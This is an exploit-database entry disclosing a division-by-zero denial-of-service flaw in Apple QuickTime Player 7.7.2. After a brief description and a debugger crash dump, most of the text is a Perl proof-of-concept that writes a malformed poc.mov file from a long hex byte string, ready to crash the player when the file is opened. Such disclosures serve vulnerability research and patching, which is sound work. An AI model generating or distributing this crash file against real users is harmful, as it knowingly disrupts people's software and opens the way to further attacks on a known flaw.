Apple QuickTime Player 7.7.2 Division By Zero

2012-10-23T00:00:00
ID 1337DAY-ID-19618
Type zdt
Reporter coolkaveh
Modified 2012-10-23T00:00:00

Description

Division by zero vulnerability during the handling of the (.mov) files. That will trigger a denial of service condition

                                        
                                            #Title     :  Apple QuickTime Player suffers from Division By Zero
#Version   :  7.7.2(1680.56)
#Date      :  2012-10-23
#Vendor    :  http://www.apple.com
#Impact    :  Med/High
#Contact   :  coolkaveh [at] rocketmail.com
#Twitter   :  @coolkaveh
#tested    :  XP SP3 ENG
###############################################################################
#Bug :
#----
#Don't forget that exploitable bugs will be published after being patched
#----
#Division by zero vulnerability during the handling of the (.mov) files.
#That will trigger a denial of service condition
#---- 
################################################################################
#(9fc.dc4): C++ EH exception - code e06d7363 (first chance)
#(9fc.dc4): C++ EH exception - code e06d7363 (first chance)
#(9fc.dc4): Integer divide-by-zero - code c0000094 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000800 
#ebx=06b11490 
#ecx=00000000 
#edx=00000000 
#esi=00000800 
#edi=01069f80
#eip=0534499f 
#esp=0013ba24 
#ebp=00000000 iopl=0         nv up ei ng nz na pe cy
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010287
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
#C:\Program Files\Common Files\Apple\Apple Application Support\CoreAudioToolbox.dll - 
#CoreAudioToolbox!ACQDesignDecoderEntry+0x2114f:
#0534499f f7f9            idiv    eax,ecx
########################################################################################################
my $poc =
"\x00\x00\x07\xB5\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64\x00\x00\x00\x00\xB6\xB6\xFE\x42\xB6".
"\xB6\xFE\x43\x00\x00\x02\x58\x00\x00\x0B\xB8\x00\x01\x00\x00\x00\xFF\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x34".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x03\xD9\x74\x72\x61\x6B\x00".
"\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x0F\xB6\xA9\x7A\x1B\xB6\xB6\xFE\x43\x00\x00\x00\x01\x00\x00".
"\x00\x00\x00\x00\x0B\xB8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x40\x00\x00\x00\x00\xBE\x00\x00\x00\xF0\x00\x00\x00\x00\x00\x18\x6C\x6F\x61\x64\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x24\x65\x64\x74\x73\x00\x00".
"\x00\x1C\x65\x6C\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x0B\xB8\x00\x00\x00\x00\x00\x01\x00".
"\x00\x00\x00\x03\x2D\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xB6\xB6\xFE\x42".
"\xB6\xB6\xFE\x43\x00\x00\x02\x58\x00\x00\x0B\xB8\x00\x00\x00\x00\x00\x00\x00\x3A\x68\x64\x6C\x72\x00".
"\x00\x00\x00\x6D\x68\x6C\x72\x76\x69\x64\x65\x61\x70\x70\x6C\x00\x00\x00\x00\x00\x01\x01\x91\x19\x41".
"\x70\x70\x6C\x65\x20\x56\x69\x64\x65\x6F\x20\x4D\x65\x64\x69\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00".
"\x00\x02\xCB\x6D\x69\x6E\x66\x00\x00\x00\x14\x76\x6D\x68\x64\x00\x00\x00\x01\x00\x40\x80\x00\x80\x00".
"\x80\x00\x00\x00\x00\x39\x68\x64\x6C\x72\x00\x00\x00\x00\x64\x68\x6C\x72\x61\x6C\x69\x73\x61\x70\x70".
"\x6C\x40\x00\x00\x01\x00\x01\x00\x49\x18\x41\x70\x70\x6C\x65\x20\x41\x6C\x69\x61\x73\x20\x44\x61\x74".
"\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00\x00\x00\x24\x64\x69\x6E\x66\x00\x00\x00\x1C\x64\x72\x65\x66".
"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x61\x6C\x69\x73\x00\x00\x00\x01\x00\x00\x02\x52\x73".
"\x74\x62\x6C\x00\x00\x00\x66\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x56\x53\x56".
"\x51\x31\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x18\x53\x56\x69\x73\x00\x00\x03\xFF\x00\x00\x02".
"\x00\x00\xBE\x00\xF0\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x0E\x53\x6F\x72\x65\x6E".
"\x73\x6F\x6E\x20\x56\x69\x64\x65\x6F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x18\xFF\xFF\x00\x00\x00\x18\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x3C".
"\x00\x00\x00\x32\x00\x00\x00\x18\x73\x74\x73\x73\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00".
"\x00\x00\x02\x00\x00\x00\x4C\x73\x74\x73\x63\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00".
"\x00\x03\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x12\x00\x00\x00".
"\x03\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\x03".
"\x00\x00\x00\x01\x00\x00\x01\x04\x73\x74\x73\x7A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3C\x00".
"\x00\x01\x94\x00\x00\x01\xE4\x00\x00\x00\x7C\x00\x00\x00\x44\x00\x00\x00\x44\x00\x00\x00\x60\x00\x00".
"\x00\x60\x00\x00\x00\x64\x00\x00\x00\x6C\x00\x00\x00\x70\x00\x00\x00\x88\x00\x00\x00\x44\x00\x00\x00".
"\x88\x00\x00\x00\x58\x00\x00\x00\xD0\x00\x00\x01\x2C\x00\x00\x02\x10\x00\x00\x02\xD0\x00\x00\x03\xE4".
"\x00\x00\x04\x00\x00\x00\x05\xC8\x00\x00\x06\xE8\x00\x00\x08\x78\x00\x00\x06\x40\x00\x00\x0A\x14\x00".
"\x00\x09\x68\x00\x00\x0B\x88\x00\x00\x0A\x1C\x00\x00\x0C\x10\x00\x00\x0A\x20\x00\x00\x10\x4C\x00\x00".
"\x0E\x90\x00\x00\x13\x5C\x00\x00\x0E\x80\x00\x00\x0F\x78\x00\x00\x0A\x54\x00\x00\x0C\x3C\x00\x00\x02".
"\x84\x00\x00\x06\x74\x00\x00\x01\xF0\x00\x00\x03\x28\x00\x00\x00\xB4\x00\x00\x00\xA4\x00\x00\x00\x9C".
"\x00\x00\x00\x88\x00\x00\x00\x3C\x00\x00\x00\x60\x00\x00\x00\x34\x00\x00\x00\x6C\x00\x00\x00\x60\x00".
"\x00\x00\x40\x00\x00\x00\x40\x00\x00\x00\x68\x00\x00\x00\x54\x00\x00\x00\x38\x00\x00\x00\x44\x00\x00".
"\x00\x60\x00\x00\x00\x40\x00\x00\x00\x3C\x00\x00\x00\x40\x00\x00\x00\x64\x73\x74\x63\x6F\x00\x00\x00".
"\x00\x00\x00\x00\x15\x00\x00\x17\xCB\x00\x00\x1B\xBF\x00\x00\x25\x53\x00\x00\x26\x83\x00\x00\x2E\xF9".
"\x00\x00\x30\xA9\x00\x00\x3D\xEF\x00\x00\x4B\x9B\x00\x00\x69\xE7\x00\x00\x88\xEB\x00\x00\xB0\x71\x00".
"\x00\xE2\xA9\x00\x01\x13\xA1\x00\x01\x28\xD5\x00\x01\x35\xDB\x00\x01\x37\xA3\x00\x01\x3E\x3B\x00\x01".
"\x3F\x07\x00\x01\x3F\xEF\x00\x01\x40\x43\x00\x01\x41\x1F\x00\x00\x00\x0C\x75\x64\x74\x61\x00\x00\x00".
"\x00\x00\x00\x02\xD7\x74\x72\x61\x6B\x00\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x0F\xB6\xA9\x7A\x1B".
"\xB6\xB6\xFE\x43\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x0B\x89\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x24\x65\x64\x74\x73\x00\x00\x00\x1C\x65\x6C\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01".
"\x00\x00\x0B\x89\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x02\x43\x6D\x64\x69\x61\x00\x00\x00\x20\x6D".
"\x64\x68\x64\x00\x00\x00\x00\xB6\xB6\xFE\x42\xB6\xB6\xFE\x42\x00\x00\x56\x22\x00\x01\xA8\x00\x00\x00".
"\x00\x00\x00\x00\x00\x3A\x68\x64\x6C\x72\x00\x00\x00\x00\x6D\x68\x6C\x72\x73\x6F\x75\x6E\x61\x70\x70".
"\x6C\x00\x00\x00\x00\x00\x01\x01\x92\x19\x41\x70\x70\x6C\x65\x20\x53\x6F\x75\x6E\x64\x20\x4D\x65\x64".
"\x69\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00\x00\x01\xE1\x6D\x69\x6E\x66\x00\x00\x00\x10\x73\x6D\x68".
"\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x39\x68\x64\x6C\x72\x00\x00\x00\x00\x64\x68\x6C\x72".
"\x61\x6C\x69\x73\x61\x70\x70\x6C\x40\x00\x00\x01\x00\x01\x00\x49\x18\x41\x70\x70\x6C\x65\x20\x41\x6C".
"\x69\x61\x73\x20\x44\x61\x74\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00\x00\x00\x24\x64\x69\x6E\x66\x00".
"\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x61\x6C\x69\x73\x00\x00".
"\x00\x01\x00\x00\x01\x6C\x73\x74\x62\x6C\x00\x00\x00\x84\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00".
"\x01\x00\x00\x00\x74\x51\x44\x4D\x32\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00".
"\x00\x02\x00\x10\x00\x00\x00\x00\x56\x22\x00\x00\x00\x00\x08\x00\x00\x00\x00\xB9\x00\x00\x01\x72\x00".
"\x00\x00\x02\x00\x00\x00\x40\x77\x61\x76\x65\x00\x00\x00\x0C\x66\x72\x6D\x61\x51\x44\x4D\x32\x00\x00".
"\x00\x24\x51\x44\x43\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x56\x22\x00\x00\x7D\x00\x00\x00\x08".
"\x00\x00\x00\x00\x00\x00\x00\x01\x72\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x73\x74\x74\x73".
"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\xA8\x00\x00\x00\x00\x01\x00\x00\x00\x7C\x73\x74\x73\x63\x00".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00".
"\x28\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x28".
"\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x28\x00".
"\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x09\x00\x00\x28\x00\x00".
"\x00\x00\x01\x00\x00\x00\x0A\x00\x00\x20\x00\x00\x00\x00\x01\x00\x00\x00\x14\x73\x74\x73\x7A\x00\x00".
"\x00\x00\x00\x00\x00\x01\x00\x01\xA8\x00\x00\x00\x00\x38\x73\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00".
"\x0A\x00\x00\x07\xE5\x00\x00\x10\x91\x00\x00\x1C\xA7\x00\x00\x27\xBF\x00\x00\x36\xB5\x00\x00\x61\x3B".
"\x00\x00\xA9\x37\x00\x01\x0A\xF5\x00\x01\x2E\xA1\x00\x01\x38\x73\x00\x00\x00\x0C\x75\x64\x74\x61\x00".
"\x00\x00\x00\x00\x00\x00\x91\x75\x64\x74\x61\x00\x00\x00\x20\x4D\x43\x50\x53\x4D\x43\x50\x52\x2D\x66".
"\x6F\x72\x20\x4D\x61\x63\x69\x6E\x74\x6F\x73\x68\x2D\x35\x2E\x30\x2E\x30\x00\x00\x00\x10\x70\x6C\x61".
"\x79\x01\x00\x00\x00\x0C\x57\x4C\x4F\x00\x00\x00\x22\xA9\x6E\x61\x6D\x00\x16\x00\x00\x51\x75\x69\x63".
"\x6B\x54\x69\x6D\x65\x20\x53\x61\x6D\x70\x6C\x65\x20\x4D\x6F\x76\x69\x65\x00\x00\x00\x27\xA9\x63\x70".
"\x79\x00\x1B\x00\x00\xA9\x20\x41\x70\x70\x6C\x65\x20\x43\x6F\x6D\x70\x75\x74\x65\x72\x2C\x20\x49\x6E".
"\x63\x2E\x20\x32\x30\x30\x31\x00\x00\x00\x0C\x57\x4C\x4F\x43\x00\x32\x00\x17\x00\x00\x00\x00\x00\x00".
"\x00\x10\x66\x72\x65\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x77\x69\x64\x65\x00\x01\x3A".
"\x0E\x6D\x64\x61\x74\x00\x00\x00\x08\x77\x69\x64\x65\x00\x00\x00\x00\x6D\x64\x61\x74\x82\x01\x6F\x17".
"\x18\x09\x25\xCC\x2F\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\xF3\xCB\x64\x7E\x99\xCC".
"\x2F\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\x16\x01\x16\x15\x01\x55\x14\x01\x55\x13".
"\x01\x20\x12\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x01\x6F\x17\x18\x09\x25\xCC\x2F".
"\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\xF3\xCB\x64\x7E\x99\xCC\x2F\x93\xF9\x65\x32".
"\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\x16\x01\x16\x15\x01\x55\x14\x01\x55\x13\x01\x20\x12\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x01\x6F\x26\xA8\x09\x25\xCC\x2F\x93\xF9\x65\x32\xBF".
"\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\xF3\xCB\x64\x7E\x99\xCC\x2F\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9".
"\xFC\x32\x99\x5F\x26\x16\x01\x16\x15\x01\x55\x14\x01\x55\x13\x01\x20\x12\x24\xFC\x45\xCC\xEA\x46\xA1".
"\x36\x36\x3A\xB7\x2E\x1A\x54\x45\x5B\xD5\x48\x5D\x35\xF2\x4A\x45\xB4\x8A\xA8\x14\xD1\x28\x46\x58\x50".
"\x23\x02\xAA\x31\xE5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x82\x01\x6F\x97\xF2\x09\x3B\x31\x53\x5F\xE1\xB8\xC3\x13\xF5\xE8\xD1\x41\x62".
"\xDD\xDD\xD6\xA4\xF5\xE0\x0D".
open(C, ">:raw", "poc.mov");
print C $poc;
close(C);

#  0day.today [2018-03-19]  #